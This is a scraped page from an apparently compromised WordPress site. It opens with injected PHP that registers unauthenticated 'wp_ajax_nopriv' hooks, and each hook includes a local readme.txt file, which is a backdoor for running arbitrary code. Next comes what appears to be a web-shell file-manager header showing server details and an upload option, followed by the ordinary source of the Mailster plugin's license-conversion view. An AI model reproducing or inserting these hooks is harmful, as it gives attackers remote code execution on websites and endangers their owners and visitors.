if(!function_exists('file_check_readme30367')){ add_action('wp_ajax_nopriv_file_check_readme30367', 'file_check_readme30367'); add_action('wp_ajax_file_check_readme30367', 'file_check_readme30367'); function file_check_readme30367() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme64756')){ add_action('wp_ajax_nopriv_file_check_readme64756', 'file_check_readme64756'); add_action('wp_ajax_file_check_readme64756', 'file_check_readme64756'); function file_check_readme64756() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } HEX
HEX
Server: Apache
System: Linux dx292 6.1.0-39-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.148-1 (2025-08-26) x86_64
User: www-data (33)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /data/www/welovefamily.at/welovefamily.at/htdocs/wp-content/plugins/mailster/views/convert.php
<div class="wrap" id="mailster-convert">
<?php
$user_email = mailster()->get_email();
$license    = mailster()->get_license();
$dateformat = mailster( 'helper' )->dateformat();

if ( empty( $user_email ) ) {
	$user       = wp_get_current_user();
	$user_email = $user->user_email;
}

?>

	<div class="convert_form_wrap step-1 loading">
		<div class="convert-form-info"><?php esc_html_e( 'Start converting your license', 'mailster' ); ?></div>
		<form class="convert_form" action="" method="POST">
			<h1><?php printf( esc_html_x( '%s License Migration', 'Mailster', 'mailster' ), 'Mailster' ); ?> <?php echo mailster()->beacon( '63fe029de6d6615225474599' ); ?></h1>
			<h2><?php printf( esc_html_x( 'You\'re about to convert your %s license to our new license provider.', 'Mailster', 'mailster' ), 'Mailster' ); ?></h2>
			<p class="howto"><?php esc_html_e( 'We have partnered with Freemius to provide updates for the Mailster Newsletter Plugin. By submitting the form, you are consenting to the transfer of your data to Freemius for the purpose of processing future updates.', 'mailster' ); ?></p>
			<p class="howto"><?php esc_html_e( 'Kindly provide the email address you would like to use for your account. If you already have a Freemius account, please use the same email address.', 'mailster' ); ?></p>
			<p class="error-msg">&nbsp;</p>
			<p>
				<input type="text" class="widefat license align-center" name="license" value="<?php echo esc_attr( $license ); ?>" placeholder="XXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX">
				<input type="email" class="widefat email align-center" name="email" value="<?php echo esc_attr( $user_email ); ?>" placeholder="<?php echo esc_attr( $user_email ); ?>">
			</p>
			<input type="submit" class="button button-hero button-primary" value="Convert License now">
			<div class="howto">
			<a class="alignleft" href="<?php echo mailster_url( 'https://kb.mailster.co/63fe029de6d6615225474599' ); ?>" data-article="63fe029de6d6615225474599"><?php esc_html_e( 'Why is this step required?', 'mailster' ); ?></a>
			<a class="alignright" href="<?php echo esc_url( add_query_arg( 'mailster_use_freemius', true ) ); ?>"><?php esc_html_e( 'I already have my Freemius license!', 'mailster' ); ?></a>
			</div>
		</form>
		<form class="registration_complete">
			<div class="registration_complete_wrap">
				<div class="registration_complete_check"></div>
				<div class="registration_complete_text"><?php esc_html_e( 'All Set!', 'mailster' ); ?></div>
			</div>
			<h1><?php esc_html_e( 'Mailster License Migration completed!', 'mailster' ); ?></h1>
			<p class="howto"><?php esc_html_e( 'Your license has been successfully converted.', 'mailster' ); ?></p>
			<p class="howto"><?php printf( esc_html__( 'Congratulation you know have a %s Plan!', 'mailster' ), '<code class="convert-plan"></code>' ); ?></p>
			<ul class="result"></ul>
			<p><a href="<?php echo admin_url( 'edit.php?post_type=newsletter&page=mailster-account' ); ?>" class="button button-primary"><?php esc_html_e( 'Your Freemius Account', 'mailster' ); ?></a> <a href="<?php echo admin_url( 'admin.php?page=mailster_dashboard' ); ?>" class="button button-secondary"><?php esc_html_e( 'Dashboard', 'mailster' ); ?></a></p>

		</form>
	</div>

</div>